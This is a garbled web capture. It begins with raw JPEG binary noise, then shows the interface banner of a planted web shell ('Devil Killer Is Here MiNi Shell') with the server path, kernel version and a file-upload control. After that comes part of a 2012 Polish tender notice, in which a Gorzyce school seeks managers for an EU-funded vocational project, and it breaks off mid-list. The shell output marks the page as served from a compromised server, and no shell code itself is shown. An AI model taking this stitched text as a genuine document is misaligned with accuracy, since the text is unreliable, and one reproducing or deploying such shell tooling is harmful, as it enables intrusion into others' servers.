JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/242848-N-2012.html

<p class="kh_header"><b>Gorzyce: Wybór kadry zarządzającej projektem pn. Podkarpacie stawia na zawodowców</b><br>
<b>Numer ogłoszenia: 242848 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Gorzycach , ul. Żwirki i Wigury 2, 39-432 Gorzyce, woj. podkarpackie, tel. 015 8362087, faks 015 8362087.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsgorzyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór kadry zarządzającej projektem pn. Podkarpacie stawia na zawodowców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wybór kadry zarządzającej projektem pn. Podkarpacie stawia na zawodowców, współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet IX - Rozwój wykształcenia i kompetencji w regionach Działanie 9.2. Podniesienie  jakości i atrakcyjności szkolnictwa zawodowego).  Projekt ma charakter edukacyjny i skierowany jest do czterech szkół ponadgimnazjalnych, dla których organem prowadzącym jest Powiat Tarnobrzeski. W ramach projektu każda ze szkół wdrażać będzie swój program rozwojowy oparty na: organizacji staży i praktyk zawodowych dla uczniów w zakładach pracy, realizacji zajęć pozalekcyjnych z zakresu nauczanych przedmiotów, realizacji kursów i warsztatów, a także obozów językowych oraz wdrażaniu narzędzi efektywnego zarządzania placówką oświatową. W każdej szkole zaangażowany zostanie minimum 1 asystent koordynatora projektu. Dodatkowo w Zespole Szkół im.por.J.Sarny w Gorzycach zaangażowany zostanie koordynator projektu i specjalista ds. zamówień publicznych.  Świadczenie usługi odbywać się będzie na podstawie umowy - zlecenia. Wszelkie działania powinny być zgodne z wymogami Programu Operacyjnego Kapitał Ludzki, opublikowanymi na stronie www.wup-rzeszow.pl oraz niżej wymienionym zakresem czynności.
Przedmiot zamówienia został podzielony na osiem części:
Zadanie 1 - Pełnienie funkcji Koordynatora projektu,
Zadanie 2 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu nr1 w Zespole Szkół Nr 1 w Nowej Dębie,
Zadanie 3 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu nr2 w Zespole Szkół Nr 1 w Nowej Dębie,
Zadanie 4 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu nr1 w Zespole Szkół Nr 2 im.E.Kwiatkowskiego w Nowej Dębie,
Zadanie 5 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu nr2 w Zespole Szkół Nr 2 im.E.Kwiatkowskiego w Nowej Dębie,
Zadanie 6 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu w Zespole Szkół im.por.J.Sarny w Gorzycach ,
Zadanie 7 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu w Specjalnego Ośrodka Szkolno - Wychowawczego w Grębowie,
Zadanie 8 - Pełnienie funkcji specjalisty ds. zamówień publicznych projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 75.12.10.00-0, 79.60.00.00-0, 79.21.10.00-6, 79.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony, gdy Wnioskodawca oświadczy, że posiada uprawnienia do prowadzenia określonej działalności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony, gdy Wnioskodawca oświadczy, że posiada uprawnienia do prowadzenia określonej działalności.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony, gdy Wnioskodawca oświadczy, że posiada uprawnienia do prowadzenia określonej działalności.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony, gdy Wnioskodawca oświadczy, że dysponuje: dla Zadania 1 - koordynator projektu jest osobą posiadającą następujące kwalifikacje : 1. Wykształcenie wyższe techniczne i ukończony kurs przygotowania pedagogicznego dający uprawnienia do nauczania w szkołach ponadgimnazjalnych  2. Doświadczenie w zarządzaniu ( min.30 miesięcy pracy na stanowisku kierowniczym) 3.Znajomość przepisów prawnych wspólnotowych i krajowych związanych z absorbcją Funduszy Strukturalnych - w tym szczególnie EFS. 4. Znajomość wytycznych, procedur i zasad związanych z procesem wdrażania POKL. Dla Zadania 2-7 - szkolny asystent koordynatora projektu jest osobą posiadającą następujące kwalifikacje: 1. Wykształcenie wyższe pedagogiczne, wyższe niepedagogiczne i ukończony kurs przygotowania pedagogicznego dający uprawnienia do nauczania w szkołach ponadgimnazjalnych lub wyższe ekonomiczne. 2. Znajomość tematyki szkolnictwa zawodowego (2 lata doświadczenia pracy w szkole ponadgimnazjalnej o profilu zawodowym). 3. Znajomość przepisów z zakresu organizacji praktycznej nauki zawodu oraz staży w ramach POKL. 4. Znajomość przepisów prawnych wspólnotowych i krajowych związanych z absorbcją Funduszy Strukturalnych w tym szczególnie EFS. 5. Posiadanie wiedzy i umiejętności z zakresu zarządzania w oświacie. Dla Zadania 8 - specjalista ds. zamówień publicznych jest osobą posiadającą następujące kwalifikacje: 1. Wykształcenie minimum średnie. 2. Minimum 2 letni staż pracy na stanowisku ds. zamówień publicznych w jednostce samorządu terytorialnego 3. Biegła znajomość pakietu MS Office, szczególnie programu Excel. 4. Znajomość obowiązujących przepisów prawnych w zakresie zamówień, w tym ustawy Prawo zamówień publicznych. 5. Znajomość zagadnień związanych z funduszami Unii Europejskiej, w szczególności Europejskiego Funduszu Społecznego i Programu Operacyjnego Kapitał Ludzki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony, gdy Wnioskodawca oświadczy, że posiada uprawnienia do prowadzenia określonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy, 
2. Pełnomocnictwo do reprezentowania Wykonawcy w niniejszym postępowaniu oraz do podpisania umowy ( o ile nie wynika to z dokumentów rejestracyjnych).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron z zachowaniem warunków określonych w art. 144 ustawy Prawo zamówień publicznych wyrażoną na piśmie, pod rygorem nieważności takiej zmiany.
2. Zamawiający przewiduje możliwość istotnych zmian w postanowieniach zawartej umowy w stosunku do treści oferty, w przypadkach konieczności zmiany terminu realizacji umowy w związku z: 
- brakiem środków na realizację zadania lub wystąpienia innych nie przewidzianych przyczyn  
- zmiany terminu realizacji projektu,
- działaniem siły  wyższej  w rozumieniu przepisów KC.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrota.podkarpackie.pl/pl/bip/powiat/tarnobrzeski/zs_gorzyce/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Gorzycach; 39-432 Gorzyce, ul. Żwirki i Wigury 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2012 godzina 14:00, miejsce: Zespół Szkół w Gorzycach; 39-432 Gorzyce, ul. Żwirki i Wigury 2; Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Podkarpacie stawia na zawodowców, jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet IX - Rozwój wykształcenia i kompetencji w regionach Działanie 9.2. Podniesienie  jakości i atrakcyjności szkolnictwa zawodowego).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Pełnienie funkcji Koordynatora projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków koordynatora obejmuje:
1) nadzór nad prawidłową realizacją merytorycznych działań projektu, zgodnie z wymogami POKL oraz obowiązującymi przepisami krajowymi, w oparciu o Umowę o dofinansowanie wraz z załącznikami,
2) informowanie dyrektora Zespołu Szkół im.por.J.Sarny w Gorzycach o wszelkich
nieprawidłowościach związanych z realizacją projektu,
3) udział w szkoleniach z zakresu realizacji projektu, 
4) planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłowa realizacją projektu,
5) przygotowywanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu, koordynowanie i nadzorowanie prac związanych z promocją, ewaluacją, realizacją oraz rozliczeniem projektu:
a)	opracowanie formularzy rekrutacyjnych oraz aktualizacja dokumentów w związku ze zmianami w projekcie,
b)	udział w pracach komisji rekrutacyjnej,
c)	zatwierdzanie części sprawozdawczej i finansowej wniosków o płatność zaliczkowa i końcową,
d)	reagowanie na nieprawidłowości występujące w ramach projektu.
6)	współpraca z innymi jednostkami organizacyjnymi Zespołu Szkół im.por.J.Sarny w Gorzycach, Wojewódzkim Urzędem Pracy, Starostwem Powiatowym, ZS Nr 1 , ZS Nr 2 w Nowej Dębie , SOSzW w Grębowie,
7)	dobór pracowników do projektu,
8)	przygotowywanie umów cywilnoprawnych w ramach projektu,
9)	nadzór nad ewidencjonowaniem czasu pracy osób zaangażowanych do realizacji projektu oraz innych projektów w ramach NSRO,
10)	przygotowanie upoważnień do przetwarzania danych osobowych dla personelu projektu oraz zgłoszenie ich do rejestru upoważnień obowiązujących w Zespole Szkół w Gorzycach,
11)	przestrzeganie procedur związanych z ochroną danych osobowych uczestników projektu, personelu oraz kontrahentów,
12)	przygotowywanie i koordynacja korespondencji związanej z realizacją projektu, prowadzonej z Wojewódzkim Urzędem Pracy w Rzeszowie,  wyjaśnianie wszelkich nieprawidłowości w realizacji projektu,
13)	monitorowanie postępów i poziomu osiągnięcia rezultatów projektu oraz postępu finansowego w poszczególnych okresach czasu, podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu,
14)	organizowanie spotkań monitorujących z pracownikami projektu oraz dyrektorami szkół uczestniczących w projekcie,
15)	zgłaszanie do WUP Rzeszów wszelkich zmian w realizacji i w budżecie projektu, przygotowywanie formularzy zmian merytorycznych i budżetowych,
16)	nadzór nad terminowym i prawidłowym przygotowaniem części finansowej i sprawozdawczej wniosków o płatność,
17)	prowadzenie kontroli realizacji działań oraz nadzór nad monitoringiem wykorzystania materiałów do części praktycznych oraz innych towarów zakupionych w ramach projektu,
18)	udział w kontrolach prowadzonych przez organy zewnętrzne,
19)	zorganizowanie biura projektu zgodnie z założeniami i wytycznymi ( zakupy, oznakowanie),
20)	zapewnienie właściwego przepływu informacji pomiędzy pracownikami projektu,
21)	nadzór nad prawidłową realizacją promocji projektu - zapewnienie zgodności wizualizacji materiałów informacyjno - promocyjnych z umowa partnerską na rzecz realizacji projektu oraz wytycznymi dotyczącymi oznaczania projektów w ramach PO KL,
22)	przygotowywanie dokumentów projektowych, konsultowanie programów kursów i treści nauczania, w celu dostosowania do wymagań egzaminacyjnych zewnętrznych instytucji,
23)	współpraca i kontakty z zewnętrznymi instytucjami egzaminacyjnymi w ramach projektu,
24)	prowadzenie ewaluacji projektu, w tym badania postępów w realizacji projektu oraz opracowanie raportu ewaluacyjnego po zakończeniu działań ( realizacji ),
25)	nadzór nad dokumentacją potwierdzającą kwalifikowalność beneficjenta ostatecznego projektu,
26)	nadzór nad prowadzeniem bazy danych PEFS,
27)	zawieranie umów w ramach udzielonego pełnomocnictwa, w tym z pracodawcami, nauczycielami i rozliczanie ich pracy,
28)	sprawdzanie i zatwierdzanie kart pracy,
29)	uczestniczenie w procedurze zamówień publicznych na zakupy z budżetu projektu zgodnie z ustawą Prawo zamówień publicznych i dokumentowaniem tych zakupów. Współpraca ze specjalistą ds. zamówień publicznych w zakresie oszacowania ilościowego i wartościowego artykułów planowanych do zakupu w ramach projektu. Praca w Komisjach Przetargowych powołanych do przeprowadzenia postępowań w związku z zastosowaniem ustawy Pzp przy realizacji zadań projektowych.,
30)	nadzór nad prawidłową realizacją umów na świadczenie usług lub dostawy, zawartych w ramach postępowań przetargowych,
31)	śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie, w celu zapewnienia zgodności projektu z wytycznymi, jak również prawem Polski i UE..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Pełnienie funkcji Szkolnego asystenta koordynatora projektu nr1 w Zespole Szkół Nr 1 w Nowej Dębie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obowiązków szkolnego asystenta koordynatora projektu nr1 w Zespole Szkół Nr 1 w Nowej Dębie obejmuje:
1)  nadzór nad prawidłową realizacją merytorycznych działań projektu w danej szkole, zgodnie z wymogami POKL, obowiązującymi przepisami krajowymi oraz w oparciu o Umowę o dofinansowanie wraz z załącznikami,
2)	planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu w danej szkole,
3)	wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu
4)	współpraca z członkami zespołu projektowego,
5)	podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,
6)	pozyskiwanie i współpraca z zakładami pracy w ramach organizacji staży i praktyk, przekazywanie do biura projektu wszelkich informacji dot. pracodawców, w celu przygotowania umów o organizację stażu lub praktyki zawodowej,
7)	przygotowanie i realizacja rekrutacji uczestników projektu (opracowanie regulaminu rekrutacji, nadzór nad przygotowaniem ankiet rekrutacyjnych, założenie teczek uczestnikom projektu). Udział w pracach Komisji Rekrutacyjnej, tworzenie protokołów z prac Komisji rekrutacyjnej, informowanie uczestników o zakwalifikowaniu się do projektu,
8)	współpraca w zakresie przygotowania rekrutacji z pedagogiem szkolnym i ustalenie zawartości teczki uczestnika projektu,
9)	monitoring rzeczowy - zgodność realizacji projektu z planem merytorycznym (monitoring dokumentacji szkoleniowej: programy i harmonogramy praktyk, staży, szkoleń, sprawdzanie dokumentacji, list obecności, potwierdzenie odbioru podręczników i materiałów szkoleniowych oraz wsparcia towarzyszącego, sprawozdania cząstkowe dotyczące prowadzonych zadań w ramach projektu),
10)	zagwarantowanie właściwych warunków pracy na poszczególnych zajęciach (odpowiedni sprzęt, wyposażenie) zapewniając prawidłowy ich przebieg. Współpraca z nauczycielami biorącymi udział w realizacji projektu w danej szkole oraz przekazywanie informacji do biura projektu o zapotrzebowaniu na materiały biurowe, itp.
11)	sprawdzanie kart pracy nauczycielom prowadzącym zajęcia i ich zatwierdzanie,
12)	informowanie potencjalnych uczestników oraz społeczeństwa o fakcie współfinansowania przedsięwzięcia ze środków Unii Europejskiej w ramach EFS,
13)	informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań,
14)	prowadzenie kontroli realizacji działań projektowych w obrębie danej szkoły,
15)	współpraca z instytucjami przeprowadzającymi egzaminy zewnętrzne w ramach projektu,
16)	wizualizacja materiałów szkoleniowych i podręczników poprzez umieszczenie naklejki informacyjnej oraz kompletowanie zestawów szkoleniowych dla uczniów i przekazywanie ich nauczycielom/trenerom. Uzyskanie potwierdzenia odbioru materiałów szkoleniowych.
17)	Współudział w organizacji spotkań informacyjnych dla uczniów i rodziców  w obrębie obsługiwanej szkoły.
